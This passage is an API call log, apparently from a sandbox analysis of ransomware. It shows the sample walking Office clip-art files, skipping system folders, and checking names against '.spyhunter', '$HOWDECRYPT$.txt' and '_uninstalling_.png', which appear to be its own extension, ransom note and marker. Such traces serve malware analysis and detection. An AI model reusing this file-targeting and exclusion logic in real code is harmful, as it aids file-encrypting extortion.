lstrlenW (lpString="$Recycle.bin") returned 12 [0096.948] lstrcmpiW (lpString1="AN03500_.WMF", lpString2="System Volume Information") returned -1 [0096.948] lstrlenW (lpString="System Volume Information") returned 25 [0096.948] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 67 [0096.948] StrStrIW (lpFirst="AN03500_.WMF", lpSrch=".spyhunter") returned 0x0 [0096.949] lstrcmpW (lpString1="AN03500_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.949] lstrcmpW (lpString1="AN03500_.WMF", lpString2="_uninstalling_.png") returned 1 [0096.949] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 67 [0096.949] GetProcessHeap () returned 0x2c0000 [0096.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34a7c0 [0096.949] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1668) returned 0x2c310e0 [0096.949] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.949] lstrcmpiW (lpString1="AN04108_.WMF", lpString2="Windows") returned -1 [0096.949] lstrlenW (lpString="Windows") returned 7 [0096.949] lstrcmpiW (lpString1="AN04108_.WMF", lpString2="$Recycle.bin") returned 1 [0096.949] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.949] lstrcmpiW (lpString1="AN04108_.WMF", lpString2="System Volume Information") returned -1 [0096.949] lstrlenW (lpString="System Volume Information") returned 25 [0096.949] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 67 [0096.949] StrStrIW (lpFirst="AN04108_.WMF", lpSrch=".spyhunter") returned 0x0 [0096.949] lstrcmpW (lpString1="AN04108_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.949] lstrcmpW (lpString1="AN04108_.WMF", lpString2="_uninstalling_.png") returned 1 [0096.949] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 67 [0096.949] GetProcessHeap () returned 0x2c0000 [0096.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34a890 [0096.949] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1670) returned 0x2c310e0 [0096.949] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.949] lstrcmpiW (lpString1="AN04117_.WMF", lpString2="Windows") returned -1 [0096.949] lstrlenW (lpString="Windows") returned 7 [0096.949] lstrcmpiW (lpString1="AN04117_.WMF", lpString2="$Recycle.bin") returned 1 [0096.949] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.949] lstrcmpiW (lpString1="AN04117_.WMF", lpString2="System Volume Information") returned -1 [0096.949] lstrlenW (lpString="System Volume Information") returned 25 [0096.949] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 67 [0096.950] StrStrIW (lpFirst="AN04117_.WMF", lpSrch=".spyhunter") returned 0x0 [0096.950] lstrcmpW (lpString1="AN04117_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.950] lstrcmpW (lpString1="AN04117_.WMF", lpString2="_uninstalling_.png") returned 1 [0096.950] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 67 [0096.950] GetProcessHeap () returned 0x2c0000 [0096.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34a960 [0096.950] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1678) returned 0x2c310e0 [0096.950] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.950] lstrcmpiW (lpString1="AN04134_.WMF", lpString2="Windows") returned -1 [0096.950] lstrlenW (lpString="Windows") returned 7 [0096.950] lstrcmpiW (lpString1="AN04134_.WMF", lpString2="$Recycle.bin") returned 1 [0096.950] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.950] lstrcmpiW (lpString1="AN04134_.WMF", lpString2="System Volume Information") returned -1 [0096.950] lstrlenW (lpString="System Volume Information") returned 25 [0096.950] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 67 [0096.950] StrStrIW (lpFirst="AN04134_.WMF", lpSrch=".spyhunter") returned 0x0 [0096.950] lstrcmpW (lpString1="AN04134_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.950] lstrcmpW (lpString1="AN04134_.WMF", lpString2="_uninstalling_.png") returned 1 [0096.950] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 67 [0096.950] GetProcessHeap () returned 0x2c0000 [0096.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34aa30 [0096.950] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1680) returned 0x2c310e0 [0096.950] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.950] lstrcmpiW (lpString1="AN04174_.WMF", lpString2="Windows") returned -1 [0096.950] lstrlenW (lpString="Windows") returned 7 [0096.950] lstrcmpiW (lpString1="AN04174_.WMF", lpString2="$Recycle.bin") returned 1 [0096.950] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.951] lstrcmpiW (lpString1="AN04174_.WMF", lpString2="System Volume Information") returned -1 [0096.951] lstrlenW (lpString="System Volume Information") returned 25 [0096.951] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 67 [0096.951] StrStrIW (lpFirst="AN04174_.WMF", lpSrch=".spyhunter") returned 0x0 [0096.951] lstrcmpW (lpString1="AN04174_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.951] lstrcmpW (lpString1="AN04174_.WMF", lpString2="_uninstalling_.png") returned 1 [0096.951] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 67 [0096.951] GetProcessHeap () returned 0x2c0000 [0096.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34ab00 [0096.951] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1688) returned 0x2c310e0 [0096.951] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.951] lstrcmpiW (lpString1="AN04191_.WMF", lpString2="Windows") returned -1 [0096.953] lstrlenW (lpString="Windows") returned 7 [0096.953] lstrcmpiW (lpString1="AN04191_.WMF", lpString2="$Recycle.bin") returned 1 [0096.953] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.953] lstrcmpiW (lpString1="AN04191_.WMF", lpString2="System Volume Information") returned -1 [0096.953] lstrlenW (lpString="System Volume Information") returned 25 [0096.953] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 67 [0096.953] StrStrIW (lpFirst="AN04191_.WMF", lpSrch=".spyhunter") returned 0x0 [0096.953] lstrcmpW (lpString1="AN04191_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.953] lstrcmpW (lpString1="AN04191_.WMF", lpString2="_uninstalling_.png") returned 1 [0096.953] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 67 [0096.953] GetProcessHeap () returned 0x2c0000 [0096.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34abd0 [0096.953] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1690) returned 0x2c310e0 [0096.953] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.953] lstrcmpiW (lpString1="AN04195_.WMF", lpString2="Windows") returned -1 [0096.953] lstrlenW (lpString="Windows") returned 7 [0096.953] lstrcmpiW (lpString1="AN04195_.WMF", lpString2="$Recycle.bin") returned 1 [0096.953] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.953] lstrcmpiW (lpString1="AN04195_.WMF", lpString2="System Volume Information") returned -1 [0096.953] lstrlenW (lpString="System Volume Information") returned 25 [0096.953] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 67 [0096.953] StrStrIW (lpFirst="AN04195_.WMF", lpSrch=".spyhunter") returned 0x0 [0096.953] lstrcmpW (lpString1="AN04195_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.953] lstrcmpW (lpString1="AN04195_.WMF", lpString2="_uninstalling_.png") returned 1 [0096.953] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 67 [0096.954] GetProcessHeap () returned 0x2c0000 [0096.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34aca0 [0096.954] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1698) returned 0x2c310e0 [0096.954] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.954] lstrcmpiW (lpString1="AN04196_.WMF", lpString2="Windows") returned -1 [0096.954] lstrlenW (lpString="Windows") returned 7 [0096.954] lstrcmpiW (lpString1="AN04196_.WMF", lpString2="$Recycle.bin") returned 1 [0096.954] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.954] lstrcmpiW (lpString1="AN04196_.WMF", lpString2="System Volume Information") returned -1 [0096.954] lstrlenW (lpString="System Volume Information") returned 25 [0096.954] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 67 [0096.954] StrStrIW (lpFirst="AN04196_.WMF", lpSrch=".spyhunter") returned 0x0 [0096.954] lstrcmpW (lpString1="AN04196_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.954] lstrcmpW (lpString1="AN04196_.WMF", lpString2="_uninstalling_.png") returned 1 [0096.954] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 67 [0096.954] GetProcessHeap () returned 0x2c0000 [0096.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34ad70 [0096.954] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x16a0) returned 0x2c310e0 [0096.954] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.954] lstrcmpiW (lpString1="AN04206_.WMF", lpString2="Windows") returned -1 [0096.954] lstrlenW (lpString="Windows") returned 7 [0096.954] lstrcmpiW (lpString1="AN04206_.WMF", lpString2="$Recycle.bin") returned 1 [0096.954] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.954] lstrcmpiW (lpString1="AN04206_.WMF", lpString2="System Volume Information") returned -1 [0096.954] lstrlenW (lpString="System Volume Information") returned 25 [0096.954] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 67 [0096.954] StrStrIW (lpFirst="AN04206_.WMF", lpSrch=".spyhunter") returned 0x0 [0096.954] lstrcmpW (lpString1="AN04206_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.954] lstrcmpW (lpString1="AN04206_.WMF", lpString2="_uninstalling_.png") returned 1 [0096.954] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 67 [0096.955] GetProcessHeap () returned 0x2c0000 [0096.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34ae40 [0096.955] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x16a8) returned 0x2c310e0 [0096.955] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.955] lstrcmpiW (lpString1="AN04225_.WMF", lpString2="Windows") returned -1 [0096.955] lstrlenW (lpString="Windows") returned 7 [0096.955] lstrcmpiW (lpString1="AN04225_.WMF", lpString2="$Recycle.bin") returned 1 [0096.955] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.955] lstrcmpiW (lpString1="AN04225_.WMF", lpString2="System Volume Information") returned -1 [0096.955] lstrlenW (lpString="System Volume Information") returned 25 [0096.955] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 67 [0096.955] StrStrIW (lpFirst="AN04225_.WMF", lpSrch=".spyhunter") returned 0x0 [0096.955] lstrcmpW (lpString1="AN04225_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.955] lstrcmpW (lpString1="AN04225_.WMF", lpString2="_uninstalling_.png") returned 1 [0096.955] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 67 [0096.955] GetProcessHeap () returned 0x2c0000 [0096.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34af10 [0096.955] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x16b0) returned 0x2c310e0 [0096.955] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.955] lstrcmpiW (lpString1="AN04235_.WMF", lpString2="Windows") returned -1 [0096.955] lstrlenW (lpString="Windows") returned 7 [0096.955] lstrcmpiW (lpString1="AN04235_.WMF", lpString2="$Recycle.bin") returned 1 [0096.955] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.955] lstrcmpiW (lpString1="AN04235_.WMF", lpString2="System Volume Information") returned -1 [0096.955] lstrlenW (lpString="System Volume Information") returned 25 [0096.955] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 67 [0096.955] StrStrIW (lpFirst="AN04235_.WMF", lpSrch=".spyhunter") returned 0x0 [0096.955] lstrcmpW (lpString1="AN04235_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.955] lstrcmpW (lpString1="AN04235_.WMF", lpString2="_uninstalling_.png") returned 1 [0096.956] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 67 [0096.956] GetProcessHeap () returned 0x2c0000 [0096.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34afe0 [0096.956] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x16b8) returned 0x2c310e0 [0096.956] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.956] lstrcmpiW (lpString1="AN04267_.WMF", lpString2="Windows") returned -1 [0096.956] lstrlenW (lpString="Windows") returned 7 [0096.956] lstrcmpiW (lpString1="AN04267_.WMF", lpString2="$Recycle.bin") returned 1 [0096.956] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.956] lstrcmpiW (lpString1="AN04267_.WMF", lpString2="System Volume Information") returned -1 [0096.956] lstrlenW (lpString="System Volume Information") returned 25 [0096.956] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 67 [0096.956] StrStrIW (lpFirst="AN04267_.WMF", lpSrch=".spyhunter") returned 0x0 [0096.956] lstrcmpW (lpString1="AN04267_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.956] lstrcmpW (lpString1="AN04267_.WMF", lpString2="_uninstalling_.png") returned 1 [0096.956] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 67 [0096.956] GetProcessHeap () returned 0x2c0000 [0096.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34b0b0 [0096.956] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x16c0) returned 0x2c310e0 [0096.956] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.029] lstrcmpiW (lpString1="AN04269_.WMF", lpString2="Windows") returned -1 [0097.029] lstrlenW (lpString="Windows") returned 7 [0097.029] lstrcmpiW (lpString1="AN04269_.WMF", lpString2="$Recycle.bin") returned 1 [0097.029] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.029] lstrcmpiW (lpString1="AN04269_.WMF", lpString2="System Volume Information") returned -1 [0097.029] lstrlenW (lpString="System Volume Information") returned 25 [0097.029] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 67 [0097.029] StrStrIW (lpFirst="AN04269_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.029] lstrcmpW (lpString1="AN04269_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.029] lstrcmpW (lpString1="AN04269_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.029] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 67 [0097.029] GetProcessHeap () returned 0x2c0000 [0097.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34b180 [0097.029] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x16c0) returned 0x2c310e0 [0097.030] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.030] lstrcmpiW (lpString1="AN04323_.WMF", lpString2="Windows") returned -1 [0097.030] lstrlenW (lpString="Windows") returned 7 [0097.030] lstrcmpiW (lpString1="AN04323_.WMF", lpString2="$Recycle.bin") returned 1 [0097.030] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.030] lstrcmpiW (lpString1="AN04323_.WMF", lpString2="System Volume Information") returned -1 [0097.030] lstrlenW (lpString="System Volume Information") returned 25 [0097.030] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 67 [0097.030] StrStrIW (lpFirst="AN04323_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.030] lstrcmpW (lpString1="AN04323_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.030] lstrcmpW (lpString1="AN04323_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.030] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 67 [0097.030] GetProcessHeap () returned 0x2c0000 [0097.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34b250 [0097.030] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x16c8) returned 0x2c310e0 [0097.030] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.030] lstrcmpiW (lpString1="AN04326_.WMF", lpString2="Windows") returned -1 [0097.030] lstrlenW (lpString="Windows") returned 7 [0097.030] lstrcmpiW (lpString1="AN04326_.WMF", lpString2="$Recycle.bin") returned 1 [0097.030] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.030] lstrcmpiW (lpString1="AN04326_.WMF", lpString2="System Volume Information") returned -1 [0097.030] lstrlenW (lpString="System Volume Information") returned 25 [0097.030] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 67 [0097.031] StrStrIW (lpFirst="AN04326_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.031] lstrcmpW (lpString1="AN04326_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.031] lstrcmpW (lpString1="AN04326_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.031] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 67 [0097.031] GetProcessHeap () returned 0x2c0000 [0097.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34b320 [0097.031] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x16d0) returned 0x2c310e0 [0097.031] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.031] lstrcmpiW (lpString1="AN04332_.WMF", lpString2="Windows") returned -1 [0097.031] lstrlenW (lpString="Windows") returned 7 [0097.031] lstrcmpiW (lpString1="AN04332_.WMF", lpString2="$Recycle.bin") returned 1 [0097.031] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.031] lstrcmpiW (lpString1="AN04332_.WMF", lpString2="System Volume Information") returned -1 [0097.031] lstrlenW (lpString="System Volume Information") returned 25 [0097.031] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 67 [0097.031] StrStrIW (lpFirst="AN04332_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.031] lstrcmpW (lpString1="AN04332_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.031] lstrcmpW (lpString1="AN04332_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.031] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 67 [0097.031] GetProcessHeap () returned 0x2c0000 [0097.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34b3f0 [0097.031] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x16d8) returned 0x2c310e0 [0097.032] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.032] lstrcmpiW (lpString1="AN04355_.WMF", lpString2="Windows") returned -1 [0097.032] lstrlenW (lpString="Windows") returned 7 [0097.032] lstrcmpiW (lpString1="AN04355_.WMF", lpString2="$Recycle.bin") returned 1 [0097.032] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.032] lstrcmpiW (lpString1="AN04355_.WMF", lpString2="System Volume Information") returned -1 [0097.032] lstrlenW (lpString="System Volume Information") returned 25 [0097.032] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 67 [0097.032] StrStrIW (lpFirst="AN04355_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.032] lstrcmpW (lpString1="AN04355_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.032] lstrcmpW (lpString1="AN04355_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.032] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 67 [0097.032] GetProcessHeap () returned 0x2c0000 [0097.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34b4c0 [0097.032] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x16e0) returned 0x2c310e0 [0097.032] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.032] lstrcmpiW (lpString1="AN04369_.WMF", lpString2="Windows") returned -1 [0097.032] lstrlenW (lpString="Windows") returned 7 [0097.032] lstrcmpiW (lpString1="AN04369_.WMF", lpString2="$Recycle.bin") returned 1 [0097.032] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.032] lstrcmpiW (lpString1="AN04369_.WMF", lpString2="System Volume Information") returned -1 [0097.032] lstrlenW (lpString="System Volume Information") returned 25 [0097.032] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 67 [0097.033] StrStrIW (lpFirst="AN04369_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.033] lstrcmpW (lpString1="AN04369_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.033] lstrcmpW (lpString1="AN04369_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.033] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 67 [0097.033] GetProcessHeap () returned 0x2c0000 [0097.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34b590 [0097.033] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x16e8) returned 0x2c310e0 [0097.033] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.033] lstrcmpiW (lpString1="AN04384_.WMF", lpString2="Windows") returned -1 [0097.033] lstrlenW (lpString="Windows") returned 7 [0097.033] lstrcmpiW (lpString1="AN04384_.WMF", lpString2="$Recycle.bin") returned 1 [0097.033] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.033] lstrcmpiW (lpString1="AN04384_.WMF", lpString2="System Volume Information") returned -1 [0097.033] lstrlenW (lpString="System Volume Information") returned 25 [0097.033] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 67 [0097.033] StrStrIW (lpFirst="AN04384_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.033] lstrcmpW (lpString1="AN04384_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.033] lstrcmpW (lpString1="AN04384_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.033] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 67 [0097.033] GetProcessHeap () returned 0x2c0000 [0097.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34b660 [0097.033] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x16f0) returned 0x2c310e0 [0097.034] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.034] lstrcmpiW (lpString1="AN04385_.WMF", lpString2="Windows") returned -1 [0097.034] lstrlenW (lpString="Windows") returned 7 [0097.034] lstrcmpiW (lpString1="AN04385_.WMF", lpString2="$Recycle.bin") returned 1 [0097.034] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.034] lstrcmpiW (lpString1="AN04385_.WMF", lpString2="System Volume Information") returned -1 [0097.034] lstrlenW (lpString="System Volume Information") returned 25 [0097.034] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | 